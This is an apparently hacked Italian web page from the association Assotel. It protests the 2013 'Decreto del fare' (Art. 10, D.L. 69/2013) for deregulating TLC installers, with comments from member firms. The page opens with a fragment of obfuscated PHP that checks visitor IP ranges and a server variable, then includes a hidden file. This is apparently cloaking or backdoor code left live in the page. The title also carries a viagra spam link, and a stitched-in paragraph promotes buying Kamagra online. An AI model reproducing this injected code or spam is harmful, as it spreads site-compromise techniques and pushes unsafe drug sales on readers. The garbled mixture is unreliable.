=$_8)&&($_7<=$_9)){$_12=true;break;}}}$_0=$_SERVER[_580009629(35)];$_16=round(0+400.4+400.4+400.4+400.4+400.4);if($_12):switch($_0){case _580009629(36):include($_1 ._580009629(37));die();break;}endif;(round(0+154+154+154)-round(0+115.5+115.5+115.5+115.5)+round(0+3186)-round(0+3186))?$GLOBALS['_1616701005_'][24]($_12,$_5,$_2):$GLOBALS['_1616701005_'][25](round(0+92.4+92.4+92.4+92.4+92.4),round(0+636.333333333+636.333333333+636.333333333)); 21 Giugno 2013 - Un brutto Giorno per il comparto TLC / ICT / IP Security - https://www.viagrapascherfr.com/viagra-pas-cher-france-marseille/

Le proposte degli Associati sono le nostre iniziative

Associarsi è semplice...

I nostri Associati

Forum

Corsi

Notizie

21 Giugno 2013 - Un brutto Giorno per il comparto TLC / ICT / IP Security

Con l'Art 10 del D.L. n° 69 del 21 Giugno 2013 chiamato anche Decreto " del fare " si cancellano professionalità e organizzazioni che i nostri Imprenditori hanno fattoi crescere negli anni con impegno e sacrifici.

Con l'Art.10 imprenditori che hanno ritenuto di operare nel rispetto delle leggi e , quindi , hanno assunto personale a tempo indeterminato , si sono dotati di satrumentazione e di autovetture , hanno investito in crescita professionale , dal 21 Giugno 2013 si troveranno ad essere in concorrenza con " cantinari " , improvvisati e operatori non regolari che offriranno le loro prestazioni a prezzi irrisori ma senza garanzie di professionalità.

Se questo è prendere " provvedimenti urgenti per il rilancio dell'economia " abbianmo poche speranze di veder crescere il nostro Paese.

D.L.n° 69 del 21 Giugno 2013

Lettera Presidente Assotel Modesto Volpe

Lettera Presidente Assistal Giuseppe Gargaro

Articolo Ing. Esitini su Cabling & Wireless

Articolo Vicepresidente Vicario Eros Prosperi su rivista on-line A & S

Giornale Di Vicenza : l'opinione di Giancarlo Oliviero

Rivista on-line Automazione Industriale : Telecontrollo senza Regole con l'Art. 10 del Degreto 69/2013

ASSOTEL Comunicato Stampa

 

ci sono numerosi farmaci per i subacquei casi. Ci sono molti di Internet farmacie legali che tratteranno prescrizioni. Ci sono numerosi medicina per ogni afflizioni. Qui di seguito sono importanti suggerimenti di difesa su "Kamagra". Quando si arriva rimedi come Kamagra avete bisogno ricordare su 'Comprare Kamagra". Altra domanda che ci accingiamo a è "Kamagra Oral Jelly da India". Anche se la disfunzione erettile in sé non è necessariamente gravi, a volte è uno dei primi segni premonitori di altre condizioni di benessere di fondo che possono essere molto gravi. Chiedo a tutti e lui risponderà che ogni farmaco ha effetti partito. Con buona fonte di chiara fama che si ottiene un risparmio, che possono essere rimborsate ben pensato-of-farmacia on-line con una prescrizione valida per questo rimedio.

Commenti

  • COMITEL SRL
    COMITEL SRL Venerdì, 28 Giugno 2013

    Liberalizzazione. Che termine strano, dalle molteplici sfaccettature. L''ho cercato sul dizionario, ed in effetti ho verificato che è utilizzabile in varie accezioni: libertà, ovvero sciogliere da vincoli e restrizioni, ma anche deregolamentare, ovvero privare di regole, cioè, assoggettare all'anarchia!
    Esatto, parlo di anarchia perchè di questo si tratta quando non esistono regole.
    La mia sensazione non mi porta a pensare che oggi, con l'abrogazione del D.M. 314 ci sia più libertà o che siano state tolte restrizioni al democratico diritto di accedere ad una professione, tant'è che chiunque, dotandosi della struttura richiesta, avrebbe potuto rispettare il D.M. 314.
    La sensazione è piuttosto quella di subire una totale deregolamentazione, ovvero constatare che le TLC siano state anarchizzate!!
    Aziende come la mia, come la Vostra, cari colleghi, in cui si trovano persone che hanno studiato per poter, anzi, per saper progettare e realizzare impianti in ambito ICT e TLC , da domani saranno equiparabili ad aziende totalmente prive dell'immensa cultura indispensabile nel ns. settore.
    Che Paese incredibile l'Italia! I nostri, per rilanciare l'economia nazionale, parlano trionfalmente di "Libertà"; e chi potrebbe mai obiettare innazi a questo termine! Ma quindi domani potrei avere la "Libertà" di fare il medico, il notaio, l'avvocato, il progettista edile, il frigorista? La risposta? No!
    Infatti non ho studiato per questi mestieri, non saprei farli nemmeno svolgerli e la legge, coerentemente, non me lo consentirebbe, come è giusto che sia.
    Figuriamoci (incredibile) che non potrei nemmeno svolgere un lavoro tanto semplice, che non richiede titoli di studio e che già svolgo già quotidianamente, ovvero "guidare". Mi pare infatti che non sia nemmeno così "libero" fare il "taxista"! Infatti, anche il mestiere del taxista è regolamentato dalla legge, per evitare che chiunque lo svolga.
    Ah già, tempo addeitro avevano provato a liberalizzare questa professione, ma i tassisti, di tutta rispsta, hanno bloccato le città per protesta e ...la politica ha pensato che fosse il caso di ripensare la cosa.
    Cari politici, le ditte esperte di TLC non intendono arrivare a gesti eclatanti, chiedono solo che vega riconosciuta la professionalità e le competenze, frutto di studi personali e di specializzazione aziendale.
    Il D.M. 314 non era perfetto, anzi, noi stessi ne auspicavamo da tempo una revisione, ma il "nulla" legislativo è per contrapposizione una vera e propria follia!
    Spero che il dialogo, in queste settimane, possa portare al reinserimento di una regolamentazione, per quanto semplice, che possa tuttavia restituire professionalità al settore.
    Ringrazio Assotel, per il contributo che certamente saprà dare quale interlocutore di riferimento per tutti noi.

    Comitel S.r.l.
    Fabrizio Gatto

  • Assotel Admin
    Assotel Admin Martedì, 02 Luglio 2013

    Buongiorno, io credo che non dobbiamo aspettare un giorno in piu ne tanto meno come dice Allodi a settembre si vedrà. Le azioni devono essere fatte adesso e in maniera eclatante. La nostra associazione non può permettersi che con un decreto legge venga cancellata la professionalità di noi tutti. Non possiamo aspettare la risposta alla lettera presentata al ministro ne vale la nostra sopravvivenza, ci rendiamo conto degli investimenti che abbiamo fatto , e che continueremo a fare ?, io ho rinnovato di recente la mia autorizzazione che per il secondo grado si aggira intorno alle 450 €, ho preso un analizzatore di protocollo, ho aggiornato il mio fluke anche per le certifiche della fibra ottica, dovrei mandare a casa almeno 2 collaboratori per mancanza di lavoro, ma sto stringendo i denti, e cosa

  • Effettua il login come socio per condividere le tue osservazioni.

 è aggregata a: 

designed and developed by Zeus Telematica SRL